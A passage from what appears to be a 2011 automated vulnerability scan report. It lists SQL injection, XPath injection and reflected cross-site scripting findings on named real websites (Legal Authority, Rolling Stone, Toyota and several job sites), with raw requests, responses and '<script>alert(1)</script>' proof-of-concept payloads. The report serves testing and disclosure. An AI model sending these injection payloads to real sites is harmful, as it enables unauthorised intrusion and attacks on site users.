var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...

1.5. http://www.legalauthority.com/signup.php [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.legalauthority.com
Path:   /signup.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /signup.php?utm_source=JDJ&utm_medium=Banner&utm_campaign=Ebook_300x300\ HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=iv24lnr1hgq1v3v7frs8feeh56; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=iv24lnr1hgq1v3v7frs8feeh56; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56275

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
<br />Who says you can't find a needle in a haystack? With my Legal Authority mailing, I batted a thousand -- got one interview and one offer, and it was in entertainment law, which my Career Services Office said was almost impossible to break into!<br
...[SNIP]...

Request 2

GET /signup.php?utm_source=JDJ&utm_medium=Banner&utm_campaign=Ebook_300x300\ HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=0n342er2lguole8u76k04aslj2; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=0n342er2lguole8u76k04aslj2; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 57332

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...

1.6. http://www.legalauthority.com/signup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.legalauthority.com
Path:   /signup.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /signup.php?utm_source=JDJ&utm_medium=Banner&utm_campaign=Ebook_300x/1'300\ HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=uhv1dg441ua1fh8c45f4p5gkv0; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=uhv1dg441ua1fh8c45f4p5gkv0; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56502

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
ct, I got an interview at a firm that I had never heard of before but does high-level trademark litigation. I was shocked. How could no one have known about this?!?!?! The salary they offered was also exceptional.

I owe my success to you, Legal Authority. Thank you!<br />
...[SNIP]...

Request 2

GET /signup.php?utm_source=JDJ&utm_medium=Banner&utm_campaign=Ebook_300x/1''300\ HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=3vujbpe2tbuhdlnq0jn1ic6ff4; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=3vujbpe2tbuhdlnq0jn1ic6ff4; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56632

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...

1.7. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.rollingstone.com
Path:   /music/albumreviews/low-country-blues-20110114

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /music'/albumreviews/low-country-blues-20110114 HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.3.3
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Server: Apache (Unix;)
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 01:26:18 GMT
Connection: close

Request 2

GET /music''/albumreviews/low-country-blues-20110114 HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.3
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Content-Length: 18158
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 01:26:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   
...[SNIP]...

1.8. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.rollingstone.com
Path:   /music/albumreviews/low-country-blues-20110114

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /music/albumreviews'/low-country-blues-20110114 HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.3.3
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Server: Apache (Unix;)
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 01:26:20 GMT
Connection: close

Request 2

GET /music/albumreviews''/low-country-blues-20110114 HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.3
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Content-Length: 18158
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 01:26:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   
...[SNIP]...

1.9. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.rollingstone.com
Path:   /music/albumreviews/low-country-blues-20110114

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /music/albumreviews/low-country-blues-20110114' HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.3.3
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Server: Apache (Unix;)
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 01:26:24 GMT
Connection: close

Request 2

GET /music/albumreviews/low-country-blues-20110114'' HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.3
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Content-Length: 18158
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 01:26:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   
...[SNIP]...

2. XPath injection  previous  next
There are 3 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


2.1. http://www.toyota.com/js/global/global.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.toyota.com
Path:   /js/global/global.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /js'/global/global.js HTTP/1.1
Host: www.toyota.com
Proxy-Connection: keep-alive
Referer: http://www.toyota.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 21 Jan 2011 17:46:22 GMT
ETag: "3cb0a-2eb01-d40bf780"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:27:45 GMT
Connection: close
Content-Length: 191233

/**
* Toyota.com global library include file. This file includes compressed versions of the following standard libraries:
*
* Prototype 1.6.1
* Script.aculo.us 1.8.3
* SWFObject 1.5
* SWFAddres
...[SNIP]...
";return{IE:!!window.attachEvent&&!A,Opera:A,WebKit:B.indexOf("AppleWebKit/")>-1,Gecko:B.indexOf("Gecko")>-1&&B.indexOf("KHTML")===-1,MobileSafari:/Apple.*Mobile.*Safari/.test(B)}})(),BrowserFeatures:{XPath:!!document.evaluate,SelectorsAPI:!!document.querySelector,ElementExtensions:(function(){var A=window.Element||window.HTMLElement;return !!(A&&A.prototype)})(),SpecificElementExtensions:(function(){if(
...[SNIP]...

2.2. http://www.toyota.com/js/global/global.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.toyota.com
Path:   /js/global/global.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /js/global'/global.js HTTP/1.1
Host: www.toyota.com
Proxy-Connection: keep-alive
Referer: http://www.toyota.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 21 Jan 2011 17:46:22 GMT
ETag: "3cb0a-2eb01-d40bf780"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:27:45 GMT
Connection: close
Content-Length: 191233

/**
* Toyota.com global library include file. This file includes compressed versions of the following standard libraries:
*
* Prototype 1.6.1
* Script.aculo.us 1.8.3
* SWFObject 1.5
* SWFAddres
...[SNIP]...
";return{IE:!!window.attachEvent&&!A,Opera:A,WebKit:B.indexOf("AppleWebKit/")>-1,Gecko:B.indexOf("Gecko")>-1&&B.indexOf("KHTML")===-1,MobileSafari:/Apple.*Mobile.*Safari/.test(B)}})(),BrowserFeatures:{XPath:!!document.evaluate,SelectorsAPI:!!document.querySelector,ElementExtensions:(function(){var A=window.Element||window.HTMLElement;return !!(A&&A.prototype)})(),SpecificElementExtensions:(function(){if(
...[SNIP]...

2.3. http://www.toyota.com/js/global/global.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.toyota.com
Path:   /js/global/global.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /js/global/global.js' HTTP/1.1
Host: www.toyota.com
Proxy-Connection: keep-alive
Referer: http://www.toyota.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 21 Jan 2011 17:46:22 GMT
ETag: "3cb0a-2eb01-d40bf780"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:27:46 GMT
Connection: close
Content-Length: 191233

/**
* Toyota.com global library include file. This file includes compressed versions of the following standard libraries:
*
* Prototype 1.6.1
* Script.aculo.us 1.8.3
* SWFObject 1.5
* SWFAddres
...[SNIP]...
";return{IE:!!window.attachEvent&&!A,Opera:A,WebKit:B.indexOf("AppleWebKit/")>-1,Gecko:B.indexOf("Gecko")>-1&&B.indexOf("KHTML")===-1,MobileSafari:/Apple.*Mobile.*Safari/.test(B)}})(),BrowserFeatures:{XPath:!!document.evaluate,SelectorsAPI:!!document.querySelector,ElementExtensions:(function(){var A=window.Element||window.HTMLElement;return !!(A&&A.prototype)})(),SpecificElementExtensions:(function(){if(
...[SNIP]...

3. Cross-site scripting (reflected)  previous  next
There are 152 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://www.100kcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.100kcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f63f4"><script>alert(1)</script>34aed88ca0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f63f4"><script>alert(1)</script>34aed88ca0a=1 HTTP/1.1
Host: www.100kcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gpaaeq68r61sips9loiulpogp4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106183

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.100kcrossing.com/?f63f4"><script>alert(1)</script>34aed88ca0a=1">
...[SNIP]...

3.2. http://www.accountingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accountingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d95ab"><script>alert(1)</script>abb072a1742 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d95ab"><script>alert(1)</script>abb072a1742=1 HTTP/1.1
Host: www.accountingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:19 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vii0tqv2bfu5e91l3g27pd6l20; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:19 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116610

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.accountingcrossing.com/?d95ab"><script>alert(1)</script>abb072a1742=1">
...[SNIP]...

3.3. http://www.accountmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accountmanagementcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1a9f"><script>alert(1)</script>9bc7f776166 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d1a9f"><script>alert(1)</script>9bc7f776166=1 HTTP/1.1
Host: www.accountmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:24 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=uue121nt18o8781h9829tgf502; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 137374

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.accountmanagementcrossing.com/?d1a9f"><script>alert(1)</script>9bc7f776166=1">
...[SNIP]...

3.4. http://www.actuarialcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.actuarialcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fb17"><script>alert(1)</script>ddc746c442e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2fb17"><script>alert(1)</script>ddc746c442e=1 HTTP/1.1
Host: www.actuarialcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:27 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ri9tldvibqror27ls0q7hbaik2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:27 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114344

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.actuarialcrossing.com/?2fb17"><script>alert(1)</script>ddc746c442e=1">
...[SNIP]...

3.5. http://www.admincrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.admincrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c58e"><script>alert(1)</script>11c63536f89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3c58e"><script>alert(1)</script>11c63536f89=1 HTTP/1.1
Host: www.admincrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:37 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=49j0tdumr2co1irf1r26vht595; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:37 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109769

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.admincrossing.com/?3c58e"><script>alert(1)</script>11c63536f89=1">
...[SNIP]...

3.6. http://www.advertisingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
